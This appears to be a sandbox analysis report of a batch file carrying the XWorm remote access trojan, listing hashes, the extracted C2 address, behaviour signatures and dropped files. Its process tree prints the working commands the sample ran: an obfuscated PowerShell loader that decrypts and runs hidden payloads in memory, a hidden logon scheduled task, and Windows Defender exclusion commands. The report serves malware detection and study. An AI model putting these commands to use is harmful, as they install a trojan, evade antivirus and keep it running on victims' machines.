Overview

overview

10

Static

static

1

world.bat

windows7-x64

8

world.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/03/2025, 10:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    world.bat

  • Size

    94KB

  • MD5

    a5bd53f790ed63251d0f435b17ada13d

  • SHA1

    c0ada960a41596819df77f185dfe79b730ade6c8

  • SHA256

    348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e

  • SHA512

    fe034f585627253eb436fc7f0b0d831e70acf93351c09e97ddb21f569cd1fc158777738eb24910c66d2a65d560801bb4cfb0835281f711f21e4e8d45e06fcfa0

  • SSDEEP

    1536:y3UhPdcYkDCDYe694UQ3DvwDnqFDdbYdLRmUpDLHcfVWeIZ9U1mRDLOeBrT:y3K6Yb694VzvweEUUefVmZOwRDLOW

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

moneyfraud-30212.portmap.host:30212

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    SvcManager.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 15 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\world.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pRmtmB/ugH2fDAdQ1jnbQ+2xlrRevgyzMZYoaNcI2bA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z/EhX1qbRvIc8ksyAuzKnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ildFc=New-Object System.IO.MemoryStream(,$param_var); $BIzdO=New-Object System.IO.MemoryStream; $wvVkJ=New-Object System.IO.Compression.GZipStream($ildFc, [IO.Compression.CompressionMode]::Decompress); $wvVkJ.CopyTo($BIzdO); $wvVkJ.Dispose(); $ildFc.Dispose(); $BIzdO.Dispose(); $BIzdO.ToArray();}function execute_function($param_var,$param2_var){ $hzQGQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MmgRI=$hzQGQ.EntryPoint; $MmgRI.Invoke($null, $param2_var);}$cnMfq = 'C:\Users\Admin\AppData\Local\Temp\world.bat';$host.UI.RawUI.WindowTitle = $cnMfq;$KwfLC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cnMfq).Split([Environment]::NewLine);foreach ($IjgYh in $KwfLC) { if ($IjgYh.StartsWith(':: ')) { $cbUwg=$IjgYh.Substring(3); break; }}$payloads_var=[string[]]$cbUwg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3056
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_798_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_798.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3968
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_798.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2456
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_798.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1144
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pRmtmB/ugH2fDAdQ1jnbQ+2xlrRevgyzMZYoaNcI2bA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z/EhX1qbRvIc8ksyAuzKnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ildFc=New-Object System.IO.MemoryStream(,$param_var); $BIzdO=New-Object System.IO.MemoryStream; $wvVkJ=New-Object System.IO.Compression.GZipStream($ildFc, [IO.Compression.CompressionMode]::Decompress); $wvVkJ.CopyTo($BIzdO); $wvVkJ.Dispose(); $ildFc.Dispose(); $BIzdO.Dispose(); $BIzdO.ToArray();}function execute_function($param_var,$param2_var){ $hzQGQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MmgRI=$hzQGQ.EntryPoint; $MmgRI.Invoke($null, $param2_var);}$cnMfq = 'C:\Users\Admin\AppData\Roaming\startup_str_798.bat';$host.UI.RawUI.WindowTitle = $cnMfq;$KwfLC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cnMfq).Split([Environment]::NewLine);foreach ($IjgYh in $KwfLC) { if ($IjgYh.StartsWith(':: ')) { $cbUwg=$IjgYh.Substring(3); break; }}$payloads_var=[string[]]$cbUwg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4092
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4120
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4532
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\SvcManager.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2080
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SvcManager.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2928

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    dbbf71e9fb59f80938f09809b160e441

    SHA1

    8b9a517d846cb9a0a284f77ed88328236a85055f

    SHA256

    e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1

    SHA512

    90b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    6d42b6da621e8df5674e26b799c8e2aa

    SHA1

    ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

    SHA256

    5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

    SHA512

    53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    167137546d959f8f83b5004ab306084d

    SHA1

    36f955e15a8e6267727f9aeb01f5c390f834cf2b

    SHA256

    1a2501cd64481a7146d07d0889ae58ac585e00a8145a38d667168a84dbff900f

    SHA512

    bb1007a03ea69e6e4db3e92112aceaff9c3950d808c8604919f6dbfa1fa52e6e1e4a9dfabf92d178e570e407e8ad39ead5b38db04d54c6da65d99d8f2938110f

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    ef72c47dbfaae0b9b0d09f22ad4afe20

    SHA1

    5357f66ba69b89440b99d4273b74221670129338

    SHA256

    692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f

    SHA512

    7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zpz1zzcc.4fe.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_798.bat
    Filesize

    94KB

    MD5

    a5bd53f790ed63251d0f435b17ada13d

    SHA1

    c0ada960a41596819df77f185dfe79b730ade6c8

    SHA256

    348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e

    SHA512

    fe034f585627253eb436fc7f0b0d831e70acf93351c09e97ddb21f569cd1fc158777738eb24910c66d2a65d560801bb4cfb0835281f711f21e4e8d45e06fcfa0

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_798.vbs
    Filesize

    115B

    MD5

    b2c8184d5c19c83ab3a87149ceede8dd

    SHA1

    d1ac5f8015a0859185d0647b93064b15fdb9fc65

    SHA256

    e1e32f6b24fdbe63d91fd7c25f3576e226cc860f1bcec1059fe7deab9b163fed

    SHA512

    86e51a1dbc3d16b427b0d0e474616f8e8933971417e3678ee902dfc064cfa672181db808f783a7c4b1bc785d80be239429b45e4bb98377c08a9d6ccd6bcbdd6f

    Download Submit

  • memory/3056-11-0x00007FFE6DC00000-0x00007FFE6E6C1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3056-14-0x0000026B64540000-0x0000026B64554000-memory.dmp

    Filesize

    80KB

    Download

  • memory/3056-0-0x00007FFE6DC03000-0x00007FFE6DC05000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3056-13-0x0000026B644C0000-0x0000026B644C8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3056-12-0x00007FFE6DC00000-0x00007FFE6E6C1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3056-50-0x00007FFE6DC00000-0x00007FFE6E6C1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3056-1-0x0000026B644D0000-0x0000026B644F2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3968-30-0x00007FFE6DC00000-0x00007FFE6E6C1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3968-27-0x00007FFE6DC00000-0x00007FFE6E6C1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3968-26-0x00007FFE6DC00000-0x00007FFE6E6C1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3968-25-0x00007FFE6DC00000-0x00007FFE6E6C1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4092-49-0x0000029E9A520000-0x0000029E9A538000-memory.dmp

    Filesize

    96KB

    Download